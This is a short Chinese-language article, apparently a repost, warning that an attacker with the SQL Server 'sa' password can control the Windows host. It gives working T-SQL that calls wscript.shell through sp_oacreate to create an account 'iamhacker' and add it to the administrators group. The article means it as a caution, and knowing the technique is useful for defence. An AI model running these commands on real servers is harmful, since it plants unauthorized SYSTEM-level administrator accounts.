SQL Server的安全隱患：不要以為黑掉的只是SQL SERVER而已。

2024-08-31 00:48:29

字體：大中小

來源：轉載

供稿：網友

sql server存在著非常嚴重的安全隱患。sa的密碼就像administrator的密碼一樣重要。

假如別人獲得了數據庫超級用戶sa的密碼，那么他/她可以在查詢分析器里使用下面的sql語句輕易在win2000(sql server所在的server)上創建一個超級用戶：

declare @object int
--創建wscript.shell
exec sp_oacreate 'wscript.shell',@object out
--運行net user iamhacker opendoor /add
--添加一個名字為iamhacker,密碼為opendoor的用戶
exec sp_oamethod @object,'run',null,'net user iamhacker opendoor /add'
--把iamhacker添加到administrators組中
exec sp_oamethod @object,'run',null,'net localgroup administrators iamhacker /add'
--把iamhacker從user組中刪除
exec sp_oamethod @object,'run',null,'net localgroup users iamhacker /del'

我已經嘗試過了。。實在太恐怖了。

上面的語句很短。核心是能夠調用平臺命令 net 。

其實現方法是sql server調用com automation的強大功能。再配合wsh中的一個對象wscript.shell的一個方法：run。（注意，一般sql server都是配置在system的權限下運行的。也就是說，run所調用的程序也是具有system的權限。）

（相關的實驗是，調用一下notepad,那么任務管理器下將有用戶為system的notepad。exe進程存在）

wscript.shell的隱患其實已經在各個方面很顯著了。想不到現在竟然在sql server上也有相關的問題。

所以。大家一定要注意保管好sa的密碼。不要隨便被人黑了哦。。。

商業源碼熱門下載www.html.org.cn

上一篇：關于SQL Server的若干注意事項

下一篇：SQL Server 的保留關鍵字一覽